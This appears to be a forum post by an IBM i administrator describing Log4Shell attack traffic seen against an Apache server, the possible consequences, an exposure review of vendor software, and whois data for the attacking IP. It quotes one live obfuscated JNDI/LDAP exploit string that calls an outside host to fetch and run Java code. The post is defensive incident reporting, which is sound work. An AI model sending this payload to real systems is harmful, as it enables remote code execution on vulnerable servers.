This is the type of request that I'm seeing against an apache web server. Not vulnerable in itself, but suppose I'm running a java application under WAS. Logging either within my application or with WAS using a vulnerable log4j version.

${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

That will cause the process doing the logging to make a connection to the server running at 45.146.164.160 and execute the java code that it gets back. That code could run a couple system checks and just report back what it finds. Logging and inventorying exploitable systems so that the attacker can loop back and make a more sophisticated attack latter. It could drop a small shell script in /tmp or the working directory of the app. It likely has write authority to those locations even if it is running under a profile like QTMHHTTP. That script could be a botnet node, a cryptominer, a web console.

Everyone is justifiably worked up about this because it allows remote code execution in a fairly trivial way, and the package that is being used in the exploit is very common in java applications. You know your software is safe, but my boss just knows we have software from vendor a, b, and c. He doesn't know if any of those vendors products use java and the affected library. So my job was to look at all the software we have on our system, and determine if we have exposure. In our case on the IBM i, we have the admin servers, and one other product, but it appears to use the old 1.x log4j. That presents it's own issues, but it's not exploitable by this attack.

FYI - this is who is 45.146.164.160 belongs to:

org-name: IT Resheniya LLC
org-type: OTHER
address: ul. Novoselov, d. 8A, of. 692
address: 193079 Saint Petersburg